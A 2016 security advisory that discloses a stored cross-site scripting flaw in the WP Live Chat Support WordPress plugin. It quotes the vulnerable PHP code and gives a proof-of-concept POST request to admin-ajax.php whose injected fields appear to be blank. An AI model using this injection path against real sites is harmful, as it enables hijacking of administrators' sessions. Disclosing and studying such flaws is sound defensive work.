------------------------------------------------------------------------ Stored Cross-Site Scripting vulnerability in WP Live Chat Support WordPress Plugin ------------------------------------------------------------------------ Dennis Kerdijk & Erwin Kievith , July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160724-0010 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on WP Live Chat Support [2] WordPress Plugin version 6.2.03. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in WP Live Chat Support version 6.2.04 [3]. ------------------------------------------------------------------------ Introduction ------------------------------------------------------------------------ WP Live Chat Support [2] allows chatting with visitors of a WordPress site. A persistent Cross-Site Scripting vulnerability has been discovered in the WP Live Chat Support allowing an attacker to execute actions on behalf of a logged on WordPress user. A stored Cross-Site Scripting vulnerability was found in the WP Live Chat Support WordPress Plugin. This issue can be exploited by an unauthenticated user. It allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ The vulnerability exists in the file wp-live-chat-support/functions.php (line 1233), which is called in the file wp-live-chat-support/wp-live-chat-support.php (line 602): wp-live-chat-support/wp-live-chat-support.php: 600 if ($_POST['action'] == "wplc_user_send_offline_message") { 601 if(function_exists('wplc_send_offline_msg')){ wplc_send_offline_msg($_POST['name'], $_POST['email'], $_POST['msg'], $_POST['cid']); } 602 if(function_exists('wplc_store_offline_message')){ wplc_store_offline_message($_POST['name'], $_POST['email'], $_POST['msg']); } 603 do_action("wplc_hook_offline_message",array( 604 "cid"=>$_POST['cid'], 605 "name"=>$_POST['name'], 606 "email"=>$_POST['email'], 607 "url"=>get_site_url(), 608 "msg"=>$_POST['msg'] 609 ) 610 ); 611 } wp-live-chat-support/functions.php: 1206 function wplc_store_offline_message($name, $email, $message){ 1207 global $wpdb; 1208 global $wplc_tblname_offline_msgs; 1209 1210 $wplc_settings = get_option('WPLC_SETTINGS'); 1211 1212 if(isset($wplc_settings['wplc_record_ip_address']) && $wplc_settings['wplc_record_ip_address'] == 1){ 1213 if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) && $_SERVER['HTTP_X_FORWARDED_FOR'] != '') { 1214 $ip_address = $_SERVER['HTTP_X_FORWARDED_FOR']; 1215 } else { 1216 $ip_address = $_SERVER['REMOTE_ADDR']; 1217 } 1218 $offline_ip_address = $ip_address; 1219 } else { 1220 $offline_ip_address = ""; 1221 } 1222 1223 1224 $ins_array = array( 1225 'timestamp' => current_time('mysql'), 1226 'name' => $name, 1227 'email' => $email, 1228 'message' => $message, 1229 'ip' => $offline_ip_address, 1230 'user_agent' => $_SERVER['HTTP_USER_AGENT'] 1231 ); 1232 1233 $rows_affected = $wpdb->insert( $wplc_tblname_offline_msgs, $ins_array ); 1234 return; 1235 } The vulnerability can be exploited using a specially crafted POST request. The victim needs view the WP Live Chat Offline Messages page to trigger the Cross-Site Scripting payload. It should be noted taht the offline message functionality is available even if there is a logged on chat user present. ------------------------------------------------------------------------ Proof of concept ------------------------------------------------------------------------ POST /wp-admin/admin-ajax.php HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 361 Connection: close action=wplc_user_send_offline_message&security=8d1fc19e30&cid=1&name=&email=Mail&msg= ------------------------------------------------------------------------ References ------------------------------------------------------------------------ [1] https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_wp_live_chat_support_wordpress_plugin.html [2] https://wordpress.org/plugins/wp-live-chat-support/ [3] https://downloads.wordpress.org/plugin/wp-live-chat-support.zip